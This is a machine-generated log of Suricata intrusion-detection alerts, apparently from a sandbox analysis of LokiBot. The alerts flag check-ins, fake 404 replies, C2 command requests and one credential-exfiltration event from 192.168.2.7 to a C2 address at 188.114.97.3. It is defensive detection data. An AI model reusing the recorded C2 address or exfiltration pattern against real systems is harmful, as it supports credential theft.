Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49779 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49779 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49754
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49715
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49713 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49758 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49779 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49777 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49779 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49705 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49726
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49745 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49761 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49761 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49777 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49761 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49777 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49761 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49745
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49743
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49761 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49735 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49735 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49735 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49761
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49756 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49744 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49756 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49744 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49735 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49735 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49700 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49760 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49760 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49700 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49741
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49771 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49758 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49760 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49706 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49706 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49735
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49777 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49747 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49777 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49758 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49758 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49736 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49736 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49736 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49737 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49771 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49737 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49737 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49736 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49736 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49744 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49790 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49790 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49758
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49747 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49786 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49747 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49747 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49786 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49786 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49763 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49767 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49771 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49756
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49797 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49767 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49771 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49771 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49767 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49786 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49700 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49786 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49777
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49713
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49797 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49797 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49738 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49738 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49738 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49796 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49797 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49796 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49738 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49779
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49738 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49767 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49700 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49728 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49790 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49728 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49767 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49714 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49714 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49714 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49771
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49747
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49763 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49714 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49714 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49714
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49788 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49788 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49788 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49796 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49767
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49776 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49776 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49776 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49788 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49788 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49776 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49776 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49788
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49776
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49796 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49765 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49796 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49765 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49789 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49789 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49789 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49701
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49790 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49789 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49790 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49731 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49731 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49731 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49800 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49800 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49800 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49731 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49731 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49800 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49705 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49800 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49711 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49786
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49711 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49763 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49759 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49759 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49728 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49797 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49765 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49765 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49763 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49763 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49759 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49710 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49710 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49710 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49710 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49705 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49730 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49800
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49730 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49730 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49744 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49797
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49796
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49728 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49728 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49730 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49759 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49812 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49730 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49809 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49759 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49809 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49702 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49809 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49790
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49711 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49711 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49809 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49744 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49809 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49705 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49710 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49763
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49804 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49728
